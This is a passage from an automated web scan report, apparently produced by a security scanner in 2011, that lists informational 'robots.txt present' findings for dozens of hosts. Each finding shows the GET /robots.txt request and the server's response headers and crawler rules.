Date: Mon, 25 Apr 2011 14:29:06 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: text/plain; charset=UTF-8
Expires: Mon, 25 Apr 2011 15:29:06 GMT
Content-Length: 26
Connection: close

User-Agent: *
Disallow: /

28.10. http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.yandex.ru
Path:	/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.yandex.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:30:37 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: text/plain; charset=UTF-8
Expires: Mon, 25 Apr 2011 15:30:37 GMT
Content-Length: 26
Connection: close

User-Agent: *
Disallow: /

28.11. https://checkout.netsuite.com/robots.txt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/robots.txt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 103
Last-Modified: Sat, 23 Apr 2011 00:28:30 GMT
NS_RTIMER_COMPOSITE: -1592275309:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/plain

# Allow all robots to spider everything by disallowing nothing

User-agent: *
Crawl-Delay: 20
Disallow:

28.12. http://clients1.google.com/complete/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clients1.google.com
Path:	/complete/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clients1.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:08:24 GMT
Expires: Mon, 25 Apr 2011 12:08:24 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.13. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Varnish: 1696648009
Date: Mon, 25 Apr 2011 15:14:04 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

28.14. http://direct.yandex.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: direct.yandex.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:59 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Vary: Host
Set-Cookie: yandexuid=710800411303742159; path=/; expires=Thu, 22-Apr-21 14:35:59 GMT; domain=.yandex.ru
Last-Modified: Mon, 09 Aug 2010 08:46:53 GMT
ETag: "2a26c4-1c3-4c5fc07d"
Accept-Ranges: bytes
Content-Length: 451

User-Agent: *
Disallow: /registered/
Disallow: /popupdisabledIps.html?disabledIps=
Disallow: /servicing?thanks=1
Disallow: /?add-half
Disallow: /?top
Disallow: /?mail
Disallow: /?hnt=
Disallow: /catal
...[SNIP]...

28.15. http://forums.manageengine.com/fbw previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.manageengine.com
Path:	/fbw

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forums.manageengine.com

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=fcab3ada-01e9-4127-bcca-5e8767e2ef21; Path=/
Set-Cookie: JSESSIONID=C454637E3F29ACCC6DE97FF79C18152E; Path=/
ETag: W/"263-1303448978000"
Last-Modified: Fri, 22 Apr 2011 05:09:38 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 263
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache-Coyote/1.1
Connection: close

# ------------------------------------------
# Zoho -- http://discussions.zoho.com
# Robot Exclusion File -- robots.txt
# Author: Rajaram.I
# Last Updated: 05/10/09
# -------------------------------
...[SNIP]...

28.16. http://games.mochiads.com/c/g/moon-volley/mvolley.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://games.mochiads.com
Path:	/c/g/moon-volley/mvolley.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: games.mochiads.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/plain
Content-Length: 23
Last-Modified: Thu, 21 Oct 2010 04:40:53 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.21:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.107:40049
X-Mochi-Source: 10.0.0.236:44381
Date: Mon, 25 Apr 2011 14:45:26 GMT
Connection: close

User-agent: *
Allow: /

28.17. http://goods.adnectar.com/analytics/get_avia_js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://goods.adnectar.com
Path:	/analytics/get_avia_js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: goods.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:25 GMT
Content-Type: text/plain
Content-Length: 204
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hYFNKXjmCLwiAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

28.18. http://goods43.adnectar.com/analytics/record_impression previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://goods43.adnectar.com
Path:	/analytics/record_impression

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: goods43.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:31:30 GMT
Content-Type: text/plain
Content-Length: 204
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hcJNKXjmCL4vAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

28.19. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 25 Apr 2011 12:06:51 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

28.20. http://ideco-software.ru/products/ims/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ideco-software.ru
Path:	/products/ims/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ideco-software.ru

Response

HTTP/1.1 200 OK
Content-Length: 58
Content-Type: text/plain
Last-Modified: Tue, 11 Nov 2008 09:18:17 GMT
Accept-Ranges: bytes
ETag: "74a2ab6ede43c91:fcf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:36:04 GMT
Connection: close

User-agent: *
Disallow:

Host: www.ideco-software.ru

28.21. http://imagesrv.gartner.com/cio/css/main.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imagesrv.gartner.com
Path:	/cio/css/main.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imagesrv.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Content-type: text/plain
Last-modified: Tue, 17 Nov 2009 16:20:54 GMT
Date: Mon, 25 Apr 2011 12:11:16 GMT
Content-Length: 28
ETag: "pvacd973686270d8ac5ed7002c7dba1bf2"
Expires: Wed, 27 Apr 2011 12:11:16 GMT
Age: 1
Cache-Control: public, s-maxage=3600, max-age=172800
X-PvInfo: [S10232.C10821.A150986.RA0.G24F27.U2A1BF8DA].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=15658f72d9195ca7a9904bc69fbdb85aec79908c2a0961ae4db564e4; Path=/

User-agent: *
Disallow: /

28.22. http://img.en25.com/Web/KronosIncorporated/kronos-ga.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.en25.com
Path:	/Web/KronosIncorporated/kronos-ga.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.en25.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 18:11:40 GMT
Accept-Ranges: bytes
ETag: "056315cfefcb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Content-Length: 44
Cache-Control: max-age=0
Date: Mon, 25 Apr 2011 14:54:46 GMT
Connection: close

# do not index
User-agent: *
Disallow: /

28.23. http://map.media6degrees.com/orbserv/aopix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://map.media6degrees.com
Path:	/orbserv/aopix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Mon, 25 Apr 2011 14:37:39 GMT
Connection: close

# go away
User-agent: *
Disallow: /

28.24. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:13:59 GMT
Expires: Mon, 25 Apr 2011 12:13:59 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.25. http://mbox5.offermatica.com/m2/netsuite/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mbox5.offermatica.com
Path:	/m2/netsuite/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mbox5.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"25-1284655556000"
Accept-Ranges: bytes
Content-Length: 25
Date: Mon, 25 Apr 2011 15:13:56 GMT
Connection: close
Last-Modified: Thu, 16 Sep 2010 16:45:56 GMT
Server: Test & Target
Content-Type: text/plain

User-agent: *
Disallow: /

28.26. http://netsuite-www.baynote.net/baynote/customerstatus2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netsuite-www.baynote.net
Path:	/baynote/customerstatus2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: netsuite-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1303743002000"
Last-Modified: Mon, 25 Apr 2011 14:50:02 GMT
Content-Type: text/plain
Content-Length: 216
Date: Mon, 25 Apr 2011 15:14:05 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

28.27. http://odnoklassniki.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odnoklassniki.ru
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: odnoklassniki.ru

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"52-1303437212000"
Last-Modified: Fri, 22 Apr 2011 01:53:32 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 52
Date: Mon, 25 Apr 2011 14:26:37 GMT
Connection: close

User-agent: *
Disallow: /profile/
Disallow: /group/

28.28. http://partner-support.wiki.zoho.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://partner-support.wiki.zoho.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: partner-support.wiki.zoho.com

Response

HTTP/1.1 200 OK
Set-Cookie: zwcsrfcki=26f97a57-e7a8-42c8-831f-0a1507f276d0; Path=/
Set-Cookie: JSESSIONID=937B73A17A5A2C608D08D102160832D6; Path=/
Expires: Tue, 24 Apr 2012 12:15:19 GMT
Content-Disposition: inline;filename="robots.txt"
Last-Modified: Mon, 25 Apr 2011 05:15:19 PDT
Content-Type: text/plain;charset=UTF-8
Content-Length: 154
Date: Mon, 25 Apr 2011 12:15:18 GMT
Server: Apache-Coyote/1.1
Connection: close

# Settings file for search engine crawlers
# Example:
# User-agent: *
# Disallow: /*
# Allow: /sitemap.zhtml
User-agent: *
Disallow: /*

28.29. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:58 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

28.30. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 26 Apr 2011 14:34:49 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS

User-agent: *
Disallow: /

28.31. http://pretty.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pretty.ru
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pretty.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:35 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 91
Last-Modified: Fri, 25 Jul 2008 12:11:17 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /a-search

User-agent: Yandex
Disallow: /a-search
Crawl-delay: 100

28.32. http://r2.mail.ru/b13057590.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13057590.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r2.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:29:55 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Mon, 28 Jun 2010 15:55:57 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

28.33. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rbcgaru.hit.gemius.pl
Path:	/_1303741244306/rexdot.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rbcgaru.hit.gemius.pl

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:44:56 GMT
Expires: Tue, 26 Apr 2011 02:44:56 GMT
Accept-Ranges: none
Cache-Control: max-age=43200
Last-Modified: Fri, 25 Mar 2011 05:08:30 GMT
Set-Cookie: Gtestss=Fsq2YwPLQP_9r7xYrzcdmPT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlSwsBFGvGQp0xo8SLL8RScGGGMaxFmPxD14HsMQGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

28.34. http://rs.mail.ru/d292152.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.mail.ru
Path:	/d292152.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rs.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:45:40 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Mon, 28 Jun 2010 15:55:57 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

28.35. http://s0.2mdn.net/1768829/GM_TS_Q3F11_BTPTsunb_300x250.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/1768829/GM_TS_Q3F11_BTPTsunb_300x250.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 25 Apr 2011 14:10:10 GMT
Expires: Tue, 26 Apr 2011 14:10:10 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 2397

User-agent: *
Disallow: /

28.36. http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGLatCCC6rQgqBbcWAgAPMgW2FgIAAQ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://safebrowsing-cache.google.com
Path:	/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGLatCCC6rQgqBbcWAgAPMgW2FgIAAQ

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:01:27 GMT
Expires: Mon, 25 Apr 2011 12:01:27 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.37. http://safebrowsing.clients.google.com/safebrowsing/downloads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://safebrowsing.clients.google.com
Path:	/safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:01:26 GMT
Expires: Mon, 25 Apr 2011 12:01:26 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.38. http://search.twitter.com/search.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.twitter.com
Path:	/search.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:40:08 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 18:04:07 GMT
Accept-Ranges: bytes
Content-Length: 45
Cache-Control: max-age=86400
Expires: Tue, 26 Apr 2011 14:40:08 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /search
Disallow: /*?

28.39. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 25 Apr 2011 15:14:05 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

28.40. http://solutions.kronos.com/content/experience2011 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://solutions.kronos.com
Path:	/content/experience2011

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: solutions.kronos.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 18:11:40 GMT
Accept-Ranges: bytes
ETag: "056315cfefcb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:54:38 GMT
Connection: keep-alive
Content-Length: 41

# do not index
User-agent: *
Allow: /

28.41. http://tengrinews.kz/tag/891/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tengrinews.kz
Path:	/tag/891/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tengrinews.kz

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:34:13 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Last-Modified: Thu, 13 Jan 2011 05:43:07 GMT
ETag: "9a69b-ae-499b3cac5d0c0"
Accept-Ranges: bytes
Content-Length: 174
Vary: Accept-Encoding

User-agent: *

Disallow: /unsorted/
Disallow: /search/
Disallow: /admin/
Disallow: /index.php

Host: tengrinews.kz

Sitemap: http://tengrinews.kz/sitemap-index.xml

28.42. http://toolbarqueries.clients.google.com/tbproxy/af/query previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://toolbarqueries.clients.google.com
Path:	/tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:01:30 GMT
Expires: Mon, 25 Apr 2011 12:01:30 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.43. http://tools.manageengine.com/forums/security-manager/forum.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.manageengine.com
Path:	/forums/security-manager/forum.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tools.manageengine.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 31 Mar 2011 05:20:00 GMT
ETag: "1da0b2-103-49fc071e1c000"
Accept-Ranges: bytes
Content-Length: 259
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# ------------------------------------------
# AdventNet Inc. -- http://traffic.adventnet.com
# Robot Exclusion File -- robots.txt
# Author: Webmaster
# Last Updated: 11-04-2005
# ------------------
...[SNIP]...

28.44. http://translate.google.com/translate_a/element.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/translate_a/element.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.google.com

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:48:26 GMT
Expires: Mon, 25 Apr 2011 14:48:26 GMT
Cache-Control: private, max-age=0
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: PREF=ID=aee9452c79d75218:TM=1303742906:LM=1303742906:S=BNtTP0A1GiFU3yk-; expires=Wed, 24-Apr-2013 14:48:26 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /?q=
Disallow: /?text=
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
D
...[SNIP]...

28.45. http://translate.googleapis.com/translate_a/t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.googleapis.com
Path:	/translate_a/t

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 09:42:43 GMT
Date: Mon, 25 Apr 2011 14:48:56 GMT
Expires: Mon, 25 Apr 2011 14:48:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.46. http://widgets.digg.com/buttons/count previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/buttons/count

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 25 Apr 2011 12:07:31 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=408 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Tue, 26 Apr 2011 12:07:30 GMT
